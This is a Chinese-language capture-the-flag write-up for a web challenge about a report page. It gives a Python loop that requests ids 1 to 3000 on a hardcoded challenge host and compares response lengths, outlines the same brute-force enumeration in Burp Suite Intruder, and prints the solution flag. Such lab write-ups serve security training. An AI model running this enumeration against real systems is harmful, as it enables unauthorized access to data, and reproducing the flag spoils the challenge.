1.信息收集:
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
发现输入日期没有反应;id值也没有变化;当手动改变id值时反馈的内容一样,按题目描述:数据被删除了,只有一处留下了入侵者的痕迹。
总之,可能在某个id里有不一样的数据;
2.按思路:
我需要再某个范围的id都试一边,但手动浪费精力和时间,那怎么办?
1.用python编程来实现,因为只有某一个id返回的内容不一样,利用这一点;
2.用各种各样的工具,本质就是一个个去试,专业一点叫爆破,我这里用Burpsuite;
用python编程:
import requests
# 定义基础 URL
base_url = "http://61.147.171.105:54389/index.php?id="
# 定义目标内容长度
target_length = None
# 循环尝试 ID
for id in range(1, 3000):
# 构建完整的 URL
url = base_url + str(id)
# 发送 HTTP 请求
response = requests.get(url)
# 获取响应的内容长度
content_length = len(response.content)
# 检查内容长度是否与目标长度不同
if target_length is None:
target_length = content_length
elif content_length != target_length:
print("找到内容长度不同的 ID:", id)
break
else:
print("未找到内容长度不同的 ID")
用Burpsuite:
1.拦截模块拦截,打开拦截,再浏览器输入地址,再把拦截到的发送到intruder模块;
2.选择变量所在位置,设置为变量,再设置相关参数的范围;
在右上角有start attack,开始:
最终比较返回数据长度,得到了flag:cyberpeace{adcb0e2db017efe133ac0ab432c09560}